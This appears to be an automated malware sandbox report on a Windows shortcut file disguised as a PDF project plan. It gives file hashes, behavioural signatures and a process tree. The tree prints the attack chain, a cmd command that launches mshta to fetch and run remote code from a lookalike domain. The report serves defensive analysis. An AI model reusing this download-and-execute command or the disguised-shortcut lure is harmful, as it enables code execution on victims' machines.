Analysis
-
max time kernel
110s -
max time network
118s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
29-10-2021 05:08
Behavioral task
behavioral1
Sample
Exchange Project Management Plan_Q3.2021.pdf.lnk
Resource
win7-en-20211014
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Exchange Project Management Plan_Q3.2021.pdf.lnk
Resource
win10-en-20211014
windows10_x64
0 signatures
0 seconds
General
-
Target
Exchange Project Management Plan_Q3.2021.pdf.lnk
-
Size
1.3MB
-
MD5
4b9366f2dcab60d56d09e69e21d77d91
-
SHA1
a46318a25582c2616f33f49f7af986137637ba1d
-
SHA256
51eaf8af57211f8d9e534f98413e71f4ddf5abcce806a111fc49a30d3bcec696
-
SHA512
4b1bdfe4d09ed047122824536e5a1f59d533c8e1780a2cbab84398a8a1ba838de916ca99234b055a49e956d9fc539a961665764a3b89dc0d6736b8d6ce1b5d04
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
mshta.exeflow pid process 9 3508 mshta.exe 11 3508 mshta.exe 13 3508 mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.execmd.exedescription pid process target process PID 2840 wrote to memory of 2852 2840 cmd.exe cmd.exe PID 2840 wrote to memory of 2852 2840 cmd.exe cmd.exe PID 2852 wrote to memory of 3508 2852 cmd.exe mshta.exe PID 2852 wrote to memory of 3508 2852 cmd.exe mshta.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Exchange Project Management Plan_Q3.2021.pdf.lnk"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b C:\Windows\System32\mshta https://docs.gsheetpage.com/oqkoB0q32czSiIjgsw+S2lfzfm4dB3TLnrpSTyuEIxI=2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exeC:\Windows\System32\mshta https://docs.gsheetpage.com/oqkoB0q32czSiIjgsw+S2lfzfm4dB3TLnrpSTyuEIxI=3⤵
- Blocklisted process makes network request